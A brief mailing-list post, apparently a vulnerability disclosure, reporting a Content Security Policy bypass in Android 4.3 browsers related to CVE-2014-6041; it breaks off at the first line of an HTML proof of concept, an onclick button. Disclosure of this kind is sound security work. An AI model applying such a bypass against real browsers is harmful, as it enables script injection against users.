Posted by E Boogie on Oct 12

I’ve found a Content Security Policy bypass similar and related to the
same origin policy bypass in CVE-2014-6041.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041

I’ve tested this on an Android 4.3 tablet running a bunch of different
browsers, including Inbrowser, Firefox, and the default Android
browser on an emulator for Android 4.3.1.

HTML PoC:

<input type=button value=”test” onclick=”…